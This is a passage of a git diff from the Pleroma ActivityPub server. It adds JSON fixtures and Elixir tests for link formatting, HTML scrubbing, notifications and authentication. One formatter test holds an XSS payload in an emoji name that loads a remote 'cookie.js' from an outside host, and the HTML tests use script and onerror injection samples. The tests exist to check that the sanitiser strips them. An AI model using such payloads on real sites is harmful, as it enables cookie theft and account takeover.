back.</p>","conversation":"https://puckipedia.com/f/conversation/4eae6d6c-d046-4737-9c17-c7a791c7ad77","id":"https://puckipedia.com/1jjx-ob5r/note","likes":"https://puckipedia.com/1jjx-ob5r/note/likes","name":"Kroeg dev thread","published":"2018-09-25T22:35:59.770Z","replies":"https://puckipedia.com/1jjx-ob5r/note/replies","shares":"https://puckipedia.com/1jjx-ob5r/note/shares","tag":{"icon":{"mediaType":"image/png","type":"Image","url":"https://puckipedia.com/forum/images/smilies/icon_e_smile.png"},"id":"https://puckipedia.com/forum/images/smilies/icon_e_smile","name":":icon_e_smile:","type":"Emoji","updated":"2018-09-16T11:11:11.111Z"},"to":"https://www.w3.org/ns/activitystreams#Public","type":"Note"},"published":"2018-09-25T22:35:59.770Z","to":"https://www.w3.org/ns/activitystreams#Public","type":"Create"}
\ No newline at end of file diff --git a/test/fixtures/kroeg-array-less-hashtag.json b/test/fixtures/kroeg-array-less-hashtag.json new file mode 100644 index 000000000..28a01904c --- /dev/null +++ b/test/fixtures/kroeg-array-less-hashtag.json @@ -0,0 +1 @@ +{"@context":["https://www.w3.org/ns/activitystreams","https://puckipedia.com/-/context"],"actor":"https://puckipedia.com/","id":"https://puckipedia.com/ur33-818k","object":{"attributedTo":{"endpoints":"https://puckipedia.com/#endpoints","followers":"https://puckipedia.com/followers","following":"https://puckipedia.com/following","icon":{"mediaType":"image/png","type":"Image","url":"https://puckipedia.com/images/avatar.png"},"id":"https://puckipedia.com/","inbox":"https://puckipedia.com/inbox","kroeg:blocks":{"id":"https://puckipedia.com/blocks"},"liked":"https://puckipedia.com/liked","manuallyApprovesFollowers":false,"name":"HACKER TEEN PUCKIPEDIA 👩💻","outbox":"https://puckipedia.com/outbox","preferredUsername":"puckipedia","publicKey":{"id":"https://puckipedia.com/#key","owner":"https://puckipedia.com/","publicKeyPem":"-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvN05xIcFE0Qgany7Rht4\n0ZI5wu++IT7K5iSqRimBYkpoeHbVcT9RFlW+aWH/QJJW/YgZ7+LMr8AMCrKrwSpS\nCndyrpx4O4lZ3FNRLu7tbklh01rGZfE6R1SFfYBpvMvImc9nYT6iezYDbv6NkHku\no3aVhjql216XlA0OhIrqQme9sAdrLbjbMrTUS8douCTkDOX+JFj1ghHCqdYEMZJI\nOY9kovtgnqyxFLm0RsPGsO1+g/OVojqG+VqHz6O2lceaTVQLlnZ4gOhLVG1tVsA2\nRfXQK+R/VgXncYE+BlQVd/tcdGAz7CDL7PP3rP65gmARnafhGR96cCOi/KzlAXSO\nMwIDAQAB\n-----END PUBLIC KEY-----","type":[]},"summary":"<p>federated hacker teen<br/>\n[<a href=\"https://pronoun.is/she\">she</a>/<a href=\"https://pronoun.is/they\">they</a>]</p>","type":"Person","updated":"2017-12-19T16:56:29.7576707+00:00"},"content":"test","id":"https://puckipedia.com/ur33-818k/note","likes":"https://puckipedia.com/ur33-818k/note/likes","replies":"https://puckipedia.com/ur33-818k/note/replies","shares":"https://puckipedia.com/ur33-818k/note/shares","tag":{"href":"https://puckipedia.com/ur33-818k/note/hashtag","id":"https://puckipedia.com/ur33-818k/note/hashtag","name":"#test","type":"Hashtag"},"to":"https://www.w3.org/ns/activitystreams#Public","type":"Note"},"to":"https://www.w3.org/ns/activitystreams#Public","type":"Create"}
\ No newline at end of file diff --git a/test/fixtures/mastodon-post-activity.json b/test/fixtures/mastodon-post-activity.json index 693e0ce39..b91263431 100644 --- a/test/fixtures/mastodon-post-activity.json +++ b/test/fixtures/mastodon-post-activity.json @@ -21,7 +21,6 @@          "http://localtesting.pleroma.lol/users/lain"      ],      "id": "http://mastodon.example.org/users/admin/statuses/99512778738411822/activity", -    "nickname": "lain",      "object": {          "atomUri": "http://mastodon.example.org/users/admin/statuses/99512778738411822",          "attachment": [], diff --git a/test/fixtures/prismo-url-map.json b/test/fixtures/prismo-url-map.json new file mode 100644 index 000000000..4e2e2fd4a --- /dev/null +++ b/test/fixtures/prismo-url-map.json @@ -0,0 +1,65 @@ +{ +    "id": "https://prismo.news/posts/83#Create", +    "type": "Create", +    "actor": [ +        { +            "type": "Person", +            "id": "https://prismo.news/@mxb" +        } +    ], +    "to": [ +        "https://www.w3.org/ns/activitystreams#Public" +    ], +    "object": { +        "id": "https://prismo.news/posts/83", +        "type": "Article", +        "name": "Introducing: Federated follows!", +        "published": "2018-11-01T07:10:05Z", +        "content": "We are more than thrilled to announce that Prismo now supports federated follows! It means you ca...", +        "url": { +            "type": "Link", +            "mimeType": "text/html", +            "href": "https://prismo.news/posts/83" +        }, +        "votes": 12, +        "attributedTo": [ +            { +                "type": "Person", +                "id": "https://prismo.news/@mxb" +            } +        ], +        "to": [ +            "https://www.w3.org/ns/activitystreams#Public" +        ], +        "tags": [ +            { +                "type": "Hashtag", +                "href": "https://prismo.news/tags/prismo", +                "name": "#prismo" +            }, +            { +                "type": "Hashtag", +                "href": "https://prismo.news/tags/prismodev", +                "name": "#prismodev" +            }, +            { +                "type": "Hashtag", +                "href": "https://prismo.news/tags/meta", +                "name": "#meta" +            } +        ], +        "@context": [ +            "https://www.w3.org/ns/activitystreams", +            "https://w3id.org/security/v1", +            { +                "Hashtag": "as:Hashtag" +            }, +            { +                "votes": { +                    "@id": "as:votes", +                    "@type": "@id" +                } +            } +        ] +    } +} diff --git a/test/formatter_test.exs b/test/formatter_test.exs index abbd7ac93..13084baa7 100644 --- a/test/formatter_test.exs +++ b/test/formatter_test.exs @@ -1,5 +1,6 @@  defmodule Pleroma.FormatterTest do    alias Pleroma.Formatter +  alias Pleroma.User    use Pleroma.DataCase    import Pleroma.Factory @@ -23,7 +24,7 @@ defmodule Pleroma.FormatterTest do        text = "Hey, check out https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla ."        expected = -        "Hey, check out <a href=\"https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla\">https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla</a> ." +        "Hey, check out <a href=\"https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla\">https://www.youtube.com/watch?v=8Zg1-TufF%20zY?x=1&y=2#blabla</a> ."        assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected @@ -54,7 +55,7 @@ defmodule Pleroma.FormatterTest do        text = "https://forum.zdoom.org/viewtopic.php?f=44&t=57087"        expected = -        "<a href=\"https://forum.zdoom.org/viewtopic.php?f=44&t=57087\">https://forum.zdoom.org/viewtopic.php?f=44&t=57087</a>" +        "<a href=\"https://forum.zdoom.org/viewtopic.php?f=44&t=57087\">https://forum.zdoom.org/viewtopic.php?f=44&t=57087</a>"        assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected @@ -75,7 +76,7 @@ defmodule Pleroma.FormatterTest do        text = "https://en.wikipedia.org/wiki/Duff's_device"        expected = -        "<a href=\"https://en.wikipedia.org/wiki/Duff's_device\">https://en.wikipedia.org/wiki/Duff's_device</a>" +        "<a href=\"https://en.wikipedia.org/wiki/Duff's_device\">https://en.wikipedia.org/wiki/Duff's_device</a>"        assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected @@ -91,6 +92,13 @@ defmodule Pleroma.FormatterTest do        expected = "<a href=\"xmpp:contact@hacktivis.me\">xmpp:contact@hacktivis.me</a>"        assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected + +      text = +        "magnet:?xt=urn:btih:7ec9d298e91d6e4394d1379caf073c77ff3e3136&tr=udp%3A%2F%2Fopentor.org%3A2710&tr=udp%3A%2F%2Ftracker.blackunicorn.xyz%3A6969&tr=udp%3A%2F%2Ftracker.ccc.de%3A80&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=wss%3A%2F%2Ftracker.btorrent.xyz&tr=wss%3A%2F%2Ftracker.fastcast.nz&tr=wss%3A%2F%2Ftracker.openwebtorrent.com" + +      expected = "<a href=\"#{text}\">#{text}</a>" + +      assert Formatter.add_links({[], text}) |> Formatter.finalize() == expected      end    end @@ -123,6 +131,53 @@ defmodule Pleroma.FormatterTest do        assert expected_text == Formatter.finalize({subs, text})      end + +    test "gives a replacement for user links when the user is using Osada" do +      mike = User.get_or_fetch("mike@osada.macgirvin.com") + +      text = "@mike@osada.macgirvin.com test" + +      mentions = Formatter.parse_mentions(text) + +      {subs, text} = Formatter.add_user_links({[], text}, mentions) + +      assert length(subs) == 1 +      Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end) + +      expected_text = +        "<span><a class='mention' href='#{mike.ap_id}'>@<span>mike</span></a></span> test" + +      assert expected_text == Formatter.finalize({subs, text}) +    end + +    test "gives a replacement for single-character local nicknames" do +      text = "@o hi" +      o = insert(:user, %{nickname: "o"}) + +      mentions = Formatter.parse_mentions(text) + +      {subs, text} = Formatter.add_user_links({[], text}, mentions) + +      assert length(subs) == 1 +      Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end) + +      expected_text = "<span><a class='mention' href='#{o.ap_id}'>@<span>o</span></a></span> hi" +      assert expected_text == Formatter.finalize({subs, text}) +    end + +    test "does not give a replacement for single-character local nicknames who don't exist" do +      text = "@a hi" + +      mentions = Formatter.parse_mentions(text) + +      {subs, text} = Formatter.add_user_links({[], text}, mentions) + +      assert length(subs) == 0 +      Enum.each(subs, fn {uuid, _} -> assert String.contains?(text, uuid) end) + +      expected_text = "@a hi" +      assert expected_text == Formatter.finalize({subs, text}) +    end    end    describe ".parse_tags" do @@ -160,14 +215,39 @@ defmodule Pleroma.FormatterTest do      text = "I love :moominmamma:"      expected_result = -      "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />" +      "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />"      assert Formatter.emojify(text) == expected_result    end +  test "it does not add XSS emoji" do +    text = +      "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):" + +    custom_emoji = %{ +      "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" => +        "https://placehold.it/1x1" +    } + +    expected_result = +      "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />" + +    assert Formatter.emojify(text, custom_emoji) == expected_result +  end +    test "it returns the emoji used in the text" do      text = "I love :moominmamma:"      assert Formatter.get_emoji(text) == [{"moominmamma", "/finmoji/128px/moominmamma-128.png"}]    end + +  test "it returns a nice empty result when no emojis are present" do +    text = "I love moominamma" +    assert Formatter.get_emoji(text) == [] +  end + +  test "it doesn't die when text is absent" do +    text = nil +    assert Formatter.get_emoji(text) == [] +  end  end diff --git a/test/html_test.exs b/test/html_test.exs new file mode 100644 index 000000000..f7150759b --- /dev/null +++ b/test/html_test.exs @@ -0,0 +1,80 @@ +defmodule Pleroma.HTMLTest do +  alias Pleroma.HTML +  use Pleroma.DataCase + +  @html_sample """ +    <b>this is in bold</b> +    <p>this is a paragraph</p> +    this is a linebreak<br /> +    this is an image: <img src="http://example.com/image.jpg"><br /> +    <script>alert('hacked')</script> +  """ + +  @html_onerror_sample """ +    <img src="http://example.com/image.jpg" onerror="alert('hacked')"> +  """ + +  describe "StripTags scrubber" do +    test "works as expected" do +      expected = """ +      this is in bold +        this is a paragraph +        this is a linebreak +        this is an image:  +        alert('hacked') +      """ + +      assert expected == HTML.strip_tags(@html_sample) +    end + +    test "does not allow attribute-based XSS" do +      expected = "\n" + +      assert expected == HTML.strip_tags(@html_onerror_sample) +    end +  end + +  describe "TwitterText scrubber" do +    test "normalizes HTML as expected" do +      expected = """ +      this is in bold +        <p>this is a paragraph</p> +        this is a linebreak<br /> +        this is an image: <img src="http://example.com/image.jpg" /><br /> +        alert('hacked') +      """ + +      assert expected == HTML.filter_tags(@html_sample, Pleroma.HTML.Scrubber.TwitterText) +    end + +    test "does not allow attribute-based XSS" do +      expected = """ +      <img src="http://example.com/image.jpg" /> +      """ + +      assert expected == HTML.filter_tags(@html_onerror_sample, Pleroma.HTML.Scrubber.TwitterText) +    end +  end + +  describe "default scrubber" do +    test "normalizes HTML as expected" do +      expected = """ +      <b>this is in bold</b> +        <p>this is a paragraph</p> +        this is a linebreak<br /> +        this is an image: <img src="http://example.com/image.jpg" /><br /> +        alert('hacked') +      """ + +      assert expected == HTML.filter_tags(@html_sample, Pleroma.HTML.Scrubber.Default) +    end + +    test "does not allow attribute-based XSS" do +      expected = """ +      <img src="http://example.com/image.jpg" /> +      """ + +      assert expected == HTML.filter_tags(@html_onerror_sample, Pleroma.HTML.Scrubber.Default) +    end +  end +end diff --git a/test/list_test.exs b/test/list_test.exs index da3b88024..19eef8f6b 100644 --- a/test/list_test.exs +++ b/test/list_test.exs @@ -90,4 +90,24 @@ defmodule Pleroma.ListTest do      assert list_two in lists      refute list_three in lists    end + +  test "getting own lists a given user belongs to" do +    owner = insert(:user) +    not_owner = insert(:user) +    member_1 = insert(:user) +    member_2 = insert(:user) +    {:ok, owned_list} = Pleroma.List.create("owned", owner) +    {:ok, not_owned_list} = Pleroma.List.create("not owned", not_owner) +    {:ok, owned_list} = Pleroma.List.follow(owned_list, member_1) +    {:ok, owned_list} = Pleroma.List.follow(owned_list, member_2) +    {:ok, not_owned_list} = Pleroma.List.follow(not_owned_list, member_1) +    {:ok, not_owned_list} = Pleroma.List.follow(not_owned_list, member_2) + +    lists_1 = Pleroma.List.get_lists_account_belongs(owner, member_1.id) +    assert owned_list in lists_1 +    refute not_owned_list in lists_1 +    lists_2 = Pleroma.List.get_lists_account_belongs(owner, member_2.id) +    assert owned_list in lists_2 +    refute not_owned_list in lists_2 +  end  end diff --git a/test/media_proxy_test.exs b/test/media_proxy_test.exs new file mode 100644 index 000000000..d71f9f13a --- /dev/null +++ b/test/media_proxy_test.exs @@ -0,0 +1,130 @@ +defmodule Pleroma.MediaProxyTest do +  use ExUnit.Case +  import Pleroma.Web.MediaProxy + +  describe "when enabled" do +    setup do +      enabled = Pleroma.Config.get([:media_proxy, :enabled]) + +      unless enabled do +        Pleroma.Config.put([:media_proxy, :enabled], true) +        on_exit(fn -> Pleroma.Config.put([:media_proxy, :enabled], enabled) end) +      end + +      :ok +    end + +    test "ignores invalid url" do +      assert url(nil) == nil +      assert url("") == nil +    end + +    test "ignores relative url" do +      assert url("/local") == "/local" +      assert url("/") == "/" +    end + +    test "ignores local url" do +      local_url = Pleroma.Web.Endpoint.url() <> "/hello" +      local_root = Pleroma.Web.Endpoint.url() +      assert url(local_url) == local_url +      assert url(local_root) == local_root +    end + +    test "encodes and decodes URL" do +      url = "https://pleroma.soykaf.com/static/logo.png" +      encoded = url(url) + +      assert String.starts_with?( +               encoded, +               Pleroma.Config.get([:media_proxy, :base_url], Pleroma.Web.base_url()) +             ) + +      assert String.ends_with?(encoded, "/logo.png") + +      assert decode_result(encoded) == url +    end + +    test "encodes and decodes URL without a path" do +      url = "https://pleroma.soykaf.com" +      encoded = url(url) +      assert decode_result(encoded) == url +    end + +    test "encodes and decodes URL without an extension" do +      url = "https://pleroma.soykaf.com/path/" +      encoded = url(url) +      assert String.ends_with?(encoded, "/path") +      assert decode_result(encoded) == url +    end + +    test "encodes and decodes URL and ignores query params for the path" do +      url = "https://pleroma.soykaf.com/static/logo.png?93939393939&bunny=true" +      encoded = url(url) +      assert String.ends_with?(encoded, "/logo.png") +      assert decode_result(encoded) == url +    end + +    test "validates signature" do +      secret_key_base = Pleroma.Config.get([Pleroma.Web.Endpoint, :secret_key_base]) + +      on_exit(fn -> +        Pleroma.Config.put([Pleroma.Web.Endpoint, :secret_key_base], secret_key_base) +      end) + +      encoded = url("https://pleroma.social") + +      Pleroma.Config.put( +        [Pleroma.Web.Endpoint, :secret_key_base], +        "00000000000000000000000000000000000000000000000" +      ) + +      [_, "proxy", sig, base64 | _] = URI.parse(encoded).path |> String.split("/") +      assert decode_url(sig, base64) == {:error, :invalid_signature} +    end + +    test "uses the configured base_url" do +      base_url = Pleroma.Config.get([:media_proxy, :base_url]) + +      if base_url do +        on_exit(fn -> +          Pleroma.Config.put([:media_proxy, :base_url], base_url) +        end) +      end + +      Pleroma.Config.put([:media_proxy, :base_url], "https://cache.pleroma.social") + +      url = "https://pleroma.soykaf.com/static/logo.png" +      encoded = url(url) + +      assert String.starts_with?(encoded, Pleroma.Config.get([:media_proxy, :base_url])) +    end +  end + +  describe "when disabled" do +    setup do +      enabled = Pleroma.Config.get([:media_proxy, :enabled]) + +      if enabled do +        Pleroma.Config.put([:media_proxy, :enabled], false) + +        on_exit(fn -> +          Pleroma.Config.put([:media_proxy, :enabled], enabled) +          :ok +        end) +      end + +      :ok +    end + +    test "does not encode remote urls" do +      assert url("https://google.fr") == "https://google.fr" +    end +  end + +  defp decode_result(encoded) do +    [_, "proxy", sig, base64 | _] = URI.parse(encoded).path |> String.split("/") +    {:ok, decoded} = decode_url(sig, base64) +    decoded +  end +end diff --git a/test/notification_test.exs b/test/notification_test.exs index 2ca1ac13d..a36ed5bb8 100644 --- a/test/notification_test.exs +++ b/test/notification_test.exs @@ -1,7 +1,9 @@  defmodule Pleroma.NotificationTest do    use Pleroma.DataCase    alias Pleroma.Web.TwitterAPI.TwitterAPI +  alias Pleroma.Web.CommonAPI    alias Pleroma.{User, Notification} +  alias Pleroma.Web.ActivityPub.Transmogrifier    import Pleroma.Factory    describe "create_notifications" do @@ -119,4 +121,253 @@ defmodule Pleroma.NotificationTest do        assert Notification.for_user(third_user) != []      end    end + +  describe "set_read_up_to()" do +    test "it sets all notifications as read up to a specified notification ID" do +      user = insert(:user) +      other_user = insert(:user) + +      {:ok, activity} = +        TwitterAPI.create_status(user, %{ +          "status" => "hey @#{other_user.nickname}!" +        }) + +      {:ok, activity} = +        TwitterAPI.create_status(user, %{ +          "status" => "hey again @#{other_user.nickname}!" +        }) + +      [n2, n1] = notifs = Notification.for_user(other_user) +      assert length(notifs) == 2 + +      assert n2.id > n1.id + +      {:ok, activity} = +        TwitterAPI.create_status(user, %{ +          "status" => "hey yet again @#{other_user.nickname}!" +        }) + +      Notification.set_read_up_to(other_user, n2.id) + +      [n3, n2, n1] = notifs = Notification.for_user(other_user) + +      assert n1.seen == true +      assert n2.seen == true +      assert n3.seen == false +    end +  end + +  describe "notification target determination" do +    test "it sends notifications to addressed users in new messages" do +      user = insert(:user) +      other_user = insert(:user) + +      {:ok, activity} = +        CommonAPI.post(user, %{ +          "status" => "hey @#{other_user.nickname}!" +        }) + +      assert other_user in Notification.get_notified_from_activity(activity) +    end + +    test "it sends notifications to mentioned users in new messages" do +      user = insert(:user) +      other_user = insert(:user) + +      create_activity = %{ +        "@context" => "https://www.w3.org/ns/activitystreams", +        "type" => "Create", +        "to" => ["https://www.w3.org/ns/activitystreams#Public"], +        "actor" => user.ap_id, +        "object" => %{ +          "type" => "Note", +          "content" => "message with a Mention tag, but no explicit tagging", +          "tag" => [ +            %{ +              "type" => "Mention", +              "href" => other_user.ap_id, +              "name" => other_user.nickname +            } +          ], +          "attributedTo" => user.ap_id +        } +      } + +      {:ok, activity} = Transmogrifier.handle_incoming(create_activity) + +      assert other_user in Notification.get_notified_from_activity(activity) +    end + +    test "it does not send notifications to users who are only cc in new messages" do +      user = insert(:user) +      other_user = insert(:user) + +      create_activity = %{ +        "@context" => "https://www.w3.org/ns/activitystreams", +        "type" => "Create", +        "to" => ["https://www.w3.org/ns/activitystreams#Public"], +        "cc" => [other_user.ap_id], +        "actor" => user.ap_id, +        "object" => %{ +          "type" => "Note", +          "content" => "hi everyone", +          "attributedTo" => user.ap_id +        } +      } + +      {:ok, activity} = Transmogrifier.handle_incoming(create_activity) + +      assert other_user not in Notification.get_notified_from_activity(activity) +    end + +    test "it does not send notification to mentioned users in likes" do +      user = insert(:user) +      other_user = insert(:user) +      third_user = insert(:user) + +      {:ok, activity_one} = +        CommonAPI.post(user, %{ +          "status" => "hey @#{other_user.nickname}!" +        }) + +      {:ok, activity_two, _} = CommonAPI.favorite(activity_one.id, third_user) + +      assert other_user not in Notification.get_notified_from_activity(activity_two) +    end + +    test "it does not send notification to mentioned users in announces" do +      user = insert(:user) +      other_user = insert(:user) +      third_user = insert(:user) + +      {:ok, activity_one} = +        CommonAPI.post(user, %{ +          "status" => "hey @#{other_user.nickname}!" +        }) + +      {:ok, activity_two, _} = CommonAPI.repeat(activity_one.id, third_user) + +      assert other_user not in Notification.get_notified_from_activity(activity_two) +    end +  end + +  describe "notification lifecycle" do +    test "liking an activity results in 1 notification, then 0 if the activity is deleted" do +      user = insert(:user) +      other_user = insert(:user) + +      {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + +      assert length(Notification.for_user(user)) == 0 + +      {:ok, _, _} = CommonAPI.favorite(activity.id, other_user) + +      assert length(Notification.for_user(user)) == 1 + +      {:ok, _} = CommonAPI.delete(activity.id, user) + +      assert length(Notification.for_user(user)) == 0 +    end + +    test "liking an activity results in 1 notification, then 0 if the activity is unliked" do +      user = insert(:user) +      other_user = insert(:user) + +      {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + +      assert length(Notification.for_user(user)) == 0 + +      {:ok, _, _} = CommonAPI.favorite(activity.id, other_user) + +      assert length(Notification.for_user(user)) == 1 + +      {:ok, _, _, _} = CommonAPI.unfavorite(activity.id, other_user) + +      assert length(Notification.for_user(user)) == 0 +    end + +    test "repeating an activity results in 1 notification, then 0 if the activity is deleted" do +      user = insert(:user) +      other_user = insert(:user) + +      {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + +      assert length(Notification.for_user(user)) == 0 + +      {:ok, _, _} = CommonAPI.repeat(activity.id, other_user) + +      assert length(Notification.for_user(user)) == 1 + +      {:ok, _} = CommonAPI.delete(activity.id, user) + +      assert length(Notification.for_user(user)) == 0 +    end + +    test "repeating an activity results in 1 notification, then 0 if the activity is unrepeated" do +      user = insert(:user) +      other_user = insert(:user) + +      {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + +      assert length(Notification.for_user(user)) == 0 + +      {:ok, _, _} = CommonAPI.repeat(activity.id, other_user) + +      assert length(Notification.for_user(user)) == 1 + +      {:ok, _, _} = CommonAPI.unrepeat(activity.id, other_user) + +      assert length(Notification.for_user(user)) == 0 +    end + +    test "liking an activity which is already deleted does not generate a notification" do +      user = insert(:user) +      other_user = insert(:user) + +      {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + +      assert length(Notification.for_user(user)) == 0 + +      {:ok, _deletion_activity} = CommonAPI.delete(activity.id, user) + +      assert length(Notification.for_user(user)) == 0 + +      {:error, _} = CommonAPI.favorite(activity.id, other_user) + +      assert length(Notification.for_user(user)) == 0 +    end + +    test "repeating an activity which is already deleted does not generate a notification" do +      user = insert(:user) +      other_user = insert(:user) + +      {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) + +      assert length(Notification.for_user(user)) == 0 + +      {:ok, _deletion_activity} = CommonAPI.delete(activity.id, user) + +      assert length(Notification.for_user(user)) == 0 + +      {:error, _} = CommonAPI.repeat(activity.id, other_user) + +      assert length(Notification.for_user(user)) == 0 +    end + +    test "replying to a deleted post without tagging does not generate a notification" do +      user = insert(:user) +      other_user = insert(:user) + +      {:ok, activity} = CommonAPI.post(user, %{"status" => "test post"}) +      {:ok, _deletion_activity} = CommonAPI.delete(activity.id, user) + +      {:ok, _reply_activity} = +        CommonAPI.post(other_user, %{ +          "status" => "test reply", +          "in_reply_to_status_id" => activity.id +        }) + +      assert length(Notification.for_user(user)) == 0 +    end +  end  end diff --git a/test/object_test.exs b/test/object_test.exs index 5eb9b7530..909605560 100644 --- a/test/object_test.exs +++ b/test/object_test.exs @@ -19,4 +19,34 @@ defmodule Pleroma.ObjectTest do        {:error, _result} = Repo.insert(cs)      end    end + +  describe "deletion function" do +    test "deletes an object" do +      object = insert(:note) +      found_object = Object.get_by_ap_id(object.data["id"]) + +      assert object == found_object + +      Object.delete(found_object) + +      found_object = Object.get_by_ap_id(object.data["id"]) + +      refute object == found_object +    end + +    test "ensures cache is cleared for the object" do +      object = insert(:note) +      cached_object = Object.get_cached_by_ap_id(object.data["id"]) + +      assert object == cached_object + +      Object.delete(cached_object) + +      {:ok, nil} = Cachex.get(:object_cache, "object:#{object.data["id"]}") + +      cached_object = Object.get_cached_by_ap_id(object.data["id"]) + +      refute object == cached_object +    end +  end  end diff --git a/test/plugs/authentication_plug_test.exs b/test/plugs/authentication_plug_test.exs index 729ac8ae5..061fa0cac 100644 --- a/test/plugs/authentication_plug_test.exs +++ b/test/plugs/authentication_plug_test.exs @@ -4,196 +4,50 @@ defmodule Pleroma.Plugs.AuthenticationPlugTest do    alias Pleroma.Plugs.AuthenticationPlug    alias Pleroma.User -  defp fetch_nil(_name) do -    {:ok, nil} -  end - -  @user %User{ -    id: 1, -    name: "dude", -    password_hash: Comeonin.Pbkdf2.hashpwsalt("guy") -  } - -  @deactivated %User{ -    id: 1, -    name: "dude", -    password_hash: Comeonin.Pbkdf2.hashpwsalt("guy"), -    info: %{"deactivated" => true} -  } - -  @session_opts [ -    store: :cookie, -    key: "_test", -    signing_salt: "cooldude" -  ] - -  defp fetch_user(_name) do -    {:ok, @user} -  end - -  defp basic_auth_enc(username, password) do -    "Basic " <> Base.encode64("#{username}:#{password}") -  end - -  describe "without an authorization header" do -    test "it halts the application" do -      conn = -        build_conn() -        |> Plug.Session.call(Plug.Session.init(@session_opts)) -        |> fetch_session -        |> AuthenticationPlug.call(%{}) - -      assert conn.status == 403 -      assert conn.halted == true -    end - -    test "it assigns a nil user if the 'optional' option is used" do -      conn = -        build_conn() -        |> Plug.Session.call(Plug.Session.init(@session_opts)) -        |> fetch_session -        |> AuthenticationPlug.call(%{optional: true}) - -      assert %{user: nil} == conn.assigns -    end -  end - -  describe "with an authorization header for a nonexisting user" do -    test "it halts the application" do -      conn = -        build_conn() -        |> Plug.Session.call(Plug.Session.init(@session_opts)) -        |> fetch_session -        |> AuthenticationPlug.call(%{fetcher: &fetch_nil/1}) - -      assert conn.status == 403 -      assert conn.halted == true -    end - -    test "it assigns a nil user if the 'optional' option is used" do -      conn = -        build_conn() -        |> Plug.Session.call(Plug.Session.init(@session_opts)) -        |> fetch_session -        |> AuthenticationPlug.call(%{optional: true, fetcher: &fetch_nil/1}) +  setup %{conn: conn} do +    user = %User{ +      id: 1, +      name: "dude", +      password_hash: Comeonin.Pbkdf2.hashpwsalt("guy") +    } -      assert %{user: nil} == conn.assigns -    end -  end - -  describe "with an incorrect authorization header for a enxisting user" do -    test "it halts the application" do -      opts = %{ -        fetcher: &fetch_user/1 -      } - -      header = basic_auth_enc("dude", "man") - -      conn = -        build_conn() -        |> Plug.Session.call(Plug.Session.init(@session_opts)) -        |> fetch_session -        |> put_req_header("authorization", header) -        |> AuthenticationPlug.call(opts) - -      assert conn.status == 403 -      assert conn.halted == true -    end - -    test "it assigns a nil user if the 'optional' option is used" do -      opts = %{ -        optional: true, -        fetcher: &fetch_user/1 -      } - -      header = basic_auth_enc("dude", "man") - -      conn = -        build_conn() -        |> Plug.Session.call(Plug.Session.init(@session_opts)) -        |> fetch_session -        |> put_req_header("authorization", header) -        |> AuthenticationPlug.call(opts) +    conn = +      conn +      |> assign(:auth_user, user) -      assert %{user: nil} == conn.assigns -    end +    %{user: user, conn: conn}    end -  describe "with a correct authorization header for an existing user" do -    test "it assigns the user", %{conn: conn} do -      opts = %{ -        optional: true, -        fetcher: &fetch_user/1 -      } +  test "it does nothing if a user is assigned", %{conn: conn} do +    conn = +      conn +      |> assign(:user, %User{}) -      header = basic_auth_enc("dude", "guy") +    ret_conn = +      conn +      |> AuthenticationPlug.call(%{}) -      conn = -        conn -        |> Plug.Session.call(Plug.Session.init(@session_opts)) -        |> fetch_session -        |> put_req_header("authorization", header) -        |> AuthenticationPlug.call(opts) - -      assert %{user: @user} == conn.assigns -      assert get_session(conn, :user_id) == @user.id -      assert conn.halted == false -    end -  end - -  describe "with a correct authorization header for an deactiviated user" do -    test "it halts the appication", %{conn: conn} do -      opts = %{ -        optional: false, -        fetcher: fn _ -> @deactivated end -      } - -      header = basic_auth_enc("dude", "guy") - -      conn = -        conn -        |> Plug.Session.call(Plug.Session.init(@session_opts)) -        |> fetch_session -        |> put_req_header("authorization", header) -        |> AuthenticationPlug.call(opts) - -      assert conn.status == 403 -      assert conn.halted == true -    end +    assert ret_conn == conn    end -  describe "with a user_id in the session for an existing user" do -    test "it assigns the user", %{conn: conn} do -      opts = %{ -        optional: true, -        fetcher: &fetch_user/1 -      } - -      header = basic_auth_enc("dude", "THIS IS WRONG") - -      conn = -        conn -        |> Plug.Session.call(Plug.Session.init(@session_opts)) -        |> fetch_session -        |> put_session(:user_id, @user.id) -        |> put_req_header("authorization", header) -        |> AuthenticationPlug.call(opts) +  test "with a correct password in the credentials, it assigns the auth_user", %{conn: conn} do +    conn = +      conn +      |> assign(:auth_credentials, %{password: "guy"}) +      |> AuthenticationPlug.call(%{}) -      assert %{user: @user} == conn.assigns -      assert get_session(conn, :user_id) == @user.id -      assert conn.halted == false -    end +    assert conn.assigns.user == conn.assigns.auth_user    end -  describe "with an assigned user" do -    test "it does nothing, returning the incoming conn", %{conn: conn} do -      conn = -        conn -        |> assign(:user, @user) +  test "with a wrong password in the credentials, it does nothing", %{conn: conn} do +    conn = +      conn +      |> assign(:auth_credentials, %{password: 